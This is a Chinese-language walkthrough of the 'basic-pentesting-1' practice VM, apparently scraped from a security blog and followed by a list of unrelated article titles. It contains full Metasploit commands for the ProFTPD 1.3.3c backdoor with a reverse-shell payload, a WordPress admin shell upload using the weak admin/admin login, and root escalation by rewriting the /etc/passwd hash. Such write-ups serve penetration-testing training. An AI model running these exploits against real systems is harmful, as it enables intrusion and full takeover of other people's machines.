basic-pentesting-1 靶机提权
2024-08-23 12:33:47
原文地址:https://www.payload.com.cn/
basic-pentesting-1
下载地址:
提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409
提权辅助工具linuxprivchecker下载:https://download.csdn.net/download/weixin_41082546/11609428
获取ip地址
端口扫描,服务识别
根据服务版本搜索相关漏洞
通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有
于是使用msf 搜索漏洞模块并利用
use exploit/unix/ftp/proftpd_133c_backdoor
set rhosts 192.168.88.197
set lhost 192.168.88.174
set payload cmd/unix/reverse
exploit
直接获得root权限。
当然还有一个80端口,我们也可以尝试从web去突破
尝试发现一些目录
在目录/secret/ 下是wordpress 网站
尝试访问,发现存在页面重定向
将网站ip 域名 写入本地hosts 文件,重新访问网站
熟悉的界面
直接进入后台登录界面
直接admin、admin 弱口令进入后台管理界面,免去了爆破的麻烦!
在获得访问权限的前提下通过msf 上传 shellcode
use exploit/unix/webapp/wp_admin_shell_upload
set lhost 192.168.88.174
set rhost 192.168.88.197
set targeturi /secret/
set username admin
set password admin
exploit
可以看到成功上传了php后门,并获得web权限
接下来提权
可以使用linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py
meterpreter > edit /etc/passwd meterpreter 下的edit 类似vim ,并且我们可以编辑/etc/psswd
root:x:0:0:root:/root:/bin/bash 第二位x 是密码占位符,密码加密存储在/etc/shadow,
我们可以假设,此处x 位 密码存在,那么root 就会默认密码为x位。就不会去读取/etc/shadow.
生成密码
openssl passwd -1
密码:admin
$1$ke/.AFq7$ykvmZ9loFhFpsOCZfJ84q1
用生成的密码替换 root的密码
:wq! 保存
shell
进入完整性shell
python -c 'import pty; pty.spawn("/bin/bash")'
su root
输入密码 admin
获取root权限
最新文章
- dom addeventlistener与id 绑定事件的区别
- .NET正则表达式基础入门(四)
- 转:已知2个整形数据a,b.不使用if,?:以及其他任何条件判断的语法,找出a跟b中数据的大者。
- Unix Pipes to Javascript Pipes
- HDU 4343 贪心
- OGRE 2.1 Windows 编译
- 启动hadoop
- AO创建IFeature的两种方法
- POJ 2378-Tree Cutting(树形dp)
- 为了找到自己的路——leo锦书62
- Linux的环境变量
- prototype 与 proto的关系是什么:
- Java语法基础学习DayThirteen(枚举类和注解)
- MySQL笔记(1)
- POJ1811(SummerTrainingDay04-G miller-rabin判断素性 && pollard-rho分解质因数)
- 3分钟搞定SpringBoot+Mybatis+druid多数据源和分布式事务
- 图片拼接SIFT
- visionpro halcon 哪个好
- magento 搬家
- Pascal ASCII和文本的转换